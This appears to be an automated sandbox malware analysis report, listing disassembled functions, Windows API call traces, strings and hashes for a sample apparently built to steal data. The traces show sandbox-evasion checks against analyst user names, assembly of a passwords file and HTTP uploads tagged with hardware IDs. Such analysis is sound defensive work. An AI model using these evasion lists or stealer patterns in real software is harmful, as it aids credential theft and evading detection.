                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                        • String ID: ERROR_V128
                                                                                                                                                                        • API String ID: 3638656634-2537946777
                                                                                                                                                                        • Opcode ID: 35c93caf5754e150b9ff98c32d8abd845c60cf5e1e9d3056925f5bc36155416c
                                                                                                                                                                        • Instruction ID: 47ef3e97d88342a226be93c2e24b35dd8a4e570ec945fc254ad1bf5ae821e744
                                                                                                                                                                        • Opcode Fuzzy Hash: 35c93caf5754e150b9ff98c32d8abd845c60cf5e1e9d3056925f5bc36155416c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FE1E332D01119AFDF12BBA4EC469DD7BB9EF28304F614026F511B70A2DB75AE068F90
                                                                                                                                                                        Function 001A4B67 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001A4B6F
                                                                                                                                                                        • __mtterm.LIBCMT ref: 001A4B7B
                                                                                                                                                                          • Part of subcall function 001A483A: DecodePointer.KERNEL32(FFFFFFFF), ref: 001A484B
                                                                                                                                                                          • Part of subcall function 001A483A: TlsFree.KERNEL32(FFFFFFFF), ref: 001A4865
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001A4B91
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001A4B9E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001A4BAB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001A4BB8
                                                                                                                                                                        • TlsAlloc.KERNEL32 ref: 001A4C08
                                                                                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 001A4C23
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 001A4C2D
                                                                                                                                                                        • EncodePointer.KERNEL32 ref: 001A4C3E
                                                                                                                                                                        • EncodePointer.KERNEL32 ref: 001A4C4B
                                                                                                                                                                        • EncodePointer.KERNEL32 ref: 001A4C58
                                                                                                                                                                        • EncodePointer.KERNEL32 ref: 001A4C65
                                                                                                                                                                        • DecodePointer.KERNEL32(Function_000249BE), ref: 001A4C86
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 001A4C9B
                                                                                                                                                                        • DecodePointer.KERNEL32(00000000), ref: 001A4CB5
                                                                                                                                                                        • __initptd.LIBCMT ref: 001A4CC0
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001A4CC7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                        • API String ID: 3732613303-3819984048
                                                                                                                                                                        • Opcode ID: 22b304180bacf75122c224b8606549c39c03c5dd717366b2d5519a2503f3a643
                                                                                                                                                                        • Instruction ID: f5bbda84bd503dffc7135ccdb742bf2a29c4d64a24fad907af1251f1980b7568
                                                                                                                                                                        • Opcode Fuzzy Hash: 22b304180bacf75122c224b8606549c39c03c5dd717366b2d5519a2503f3a643
                                                                                                                                                                        • Instruction Fuzzy Hash: 90318F7980B7509BC711AFB9BC096163FA4EB8A720751862BE414D3EB4E7B0D5C0CF50
                                                                                                                                                                        Function 00188533 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 231stringmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 001885D8
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0018862D
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00188634
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001886D2
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 001886EB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 001886F5
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B719C), ref: 00188701
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0018870B
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A0), ref: 00188717
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00188724
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0018872E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A4), ref: 0018873A
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00188747
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00188751
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71A8), ref: 0018875D
                                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0018876A
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00188774
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71AC), ref: 00188780
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B71B0), ref: 0018878C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001887C5
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00188812
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                                        • API String ID: 1139693110-347816968
                                                                                                                                                                        • Opcode ID: 32e2ea5c58a8d2cc257061a6b0ab31929b8b0825296acb9e88afe01fda8dbb4d
                                                                                                                                                                        • Instruction ID: 0a66f04e5775c63a194c2c49e1af25f2b3182997193e929f14349a07a2413686
                                                                                                                                                                        • Opcode Fuzzy Hash: 32e2ea5c58a8d2cc257061a6b0ab31929b8b0825296acb9e88afe01fda8dbb4d
                                                                                                                                                                        • Instruction Fuzzy Hash: DF813436941118AFCF03BBA4FD4A9DD7BB9EF28300F504062FA01A7161DB35AE158F91
                                                                                                                                                                        Function 00181927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00181A13
                                                                                                                                                                        • lstrcmpiA.KERNEL32(001BABCC,?), ref: 00181A2E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUserlstrcmpi
                                                                                                                                                                        • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                        • API String ID: 542268695-1784693376
                                                                                                                                                                        • Opcode ID: 7f24db0b3c17c95c1926e50c30639d6fc63049a3f84483d0184f54f91842ae8b
                                                                                                                                                                        • Instruction ID: 3e853207099eb4ce7cffb18f86059e686da7fa5bc1873e583bd83eca87628f87
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f24db0b3c17c95c1926e50c30639d6fc63049a3f84483d0184f54f91842ae8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9021F0B190526C9BCB64DF15DE896D9BFB8AF49308F8001D8D548BB210CBB04BC9CF86
                                                                                                                                                                        Function 00184B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00184BCD
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00184BEB
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184D83
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00184DC7
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00184DF5
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • lstrlenA.KERNEL32(?,001B6947,",build_id,001B77BC,------,001B77B0,",hwid,001B779C,------), ref: 001850EE
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185101
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0018510F
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0018516C
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00185177
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0018518E
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0018519A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                        • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                        • API String ID: 3006978581-3960666492
                                                                                                                                                                        • Opcode ID: 75a20994e1251e8476d0ca13741fb50426897652bba1c76882d5dde338264602
                                                                                                                                                                        • Instruction ID: a13c6d2a183a5b0c73785d9ac3413ea6bff69fb9e34d8da195a6c727d394466f
                                                                                                                                                                        • Opcode Fuzzy Hash: 75a20994e1251e8476d0ca13741fb50426897652bba1c76882d5dde338264602
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E025B31D5512A9BDF22BB20DC46ADDB7B8FF28704F4680E1A54977162CB746E868FC0
                                                                                                                                                                        Function 001925E1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 224stringprocesssynchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • _memset.LIBCMT ref: 001927F1
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?), ref: 00192803
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A0), ref: 00192815
                                                                                                                                                                        • lstrcatA.KERNEL32(?,df523263f44cc8d55414a260a0197e4a), ref: 00192827
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A4), ref: 00192839
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00192849
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A8), ref: 0019285B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00192864
                                                                                                                                                                        • lstrcatA.KERNEL32(?,EMPTY), ref: 00192880
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66B4), ref: 00192892
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 001928A2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66B8), ref: 001928B4
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001928C1
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 0019241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00194ACD), ref: 00192435
                                                                                                                                                                        • _memset.LIBCMT ref: 001928F7
                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,001B66BC,?), ref: 00192964
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00192972
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
